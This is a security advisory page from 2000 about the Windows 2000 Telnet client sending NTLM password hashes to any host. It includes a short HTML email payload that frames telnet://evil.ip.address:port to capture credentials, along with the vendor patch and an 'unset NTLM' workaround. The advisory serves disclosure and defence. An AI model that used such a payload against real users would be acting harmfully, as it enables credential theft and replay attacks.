Skip navigation
Menu
End-User Platforms>Windows 7/8

Windows 2000 Telnet Vulnerable To Password Stealing

 

Reported September 14, 2000 by @stake

VERSIONS AFFECTED
  • Windows 2000 Telnet Client (All versions of Windows 2000)

DESCRIPTION

Originally discovered by @stake Windows 2000 Telnet is vulnerable to NTLM password capturing, cracking and replaying. 

By default NTLM Authentication is enabled on Microsoft Windows 2000 telnet clients and regardless of the server answering, Windows 2000 will first attempt to authenticate using NTLM.  As learned in the past with Windows NT 4.0, NTLM is vulnerable to password cracking attacks.

DEMONSTRATION

This can be exploited in a number or ways.  The easiest and probably most documented way to exploit this is by sending a specially crafted email to the target forcing their Telnet client to attempt to authenticate thus sending the NTLM hash to a specified location.

The following HTML could be inserted into an email to accomplish this;  

      <html>
      <frameset rows="100%,*">
      <frame src=about:blank>
      <frame src=telnet://evil.ip.address:port>
      </frameset>
      </html>

Once the target opens the email using either Microsoft Outlook, Outlook Express, Internet Explorer, Netscape Navigator, or Netscape Messenger the built in Telnet Client will attempt to authenticate to the specified IP address and port.

Once the Telnet client sends the NTLM authentication packet the attacker can simply crack the hashes and obtain a working username and password.  Or, an attacker may replay the NTLM hash and use it to authenticate to network resources.

VENDOR RESPONSE

Microsoft is very aware of this issue and has been working with @Stake for quite some time on patching the issue.  A Microsoft Security Bulletin is available at; 

 http://www.microsoft.com/technet/security/bulletin/MS00-067.asp

Microsoft has also released a patch that is available at; 

 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24319

@Stake has also released proof of concept code that can be downloaded from their web site.

It is also possible to defend against this issue by simply disabling NTLM authentication on Windows 2000 Telnet clients.  This is done by launching a command prompt and typing "unset NTLM" then exiting the Telnet client to save all changes.

CREDIT
Discovered by @stake
TAGS: Security
Hide comments

More information about text formats

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish
Recommended Reading
PowerShell screenshot shows Where-Object cmdlet
How to Use the PowerShell Where-Object Cmdlet
Aug 04, 2022
shield_icon_laptop.jpg
What To Do When Windows Defender Is Not Working
Mar 15, 2022
Computer Screen Showing Password Dialog Box
Microsoft Edge Downloads Updated for Azure AD Sign-In & Sync
Aug 22, 2019
mktg-wp-nolabel5
How to Approach the Windows 7 to 10 Migration
Aug 01, 2019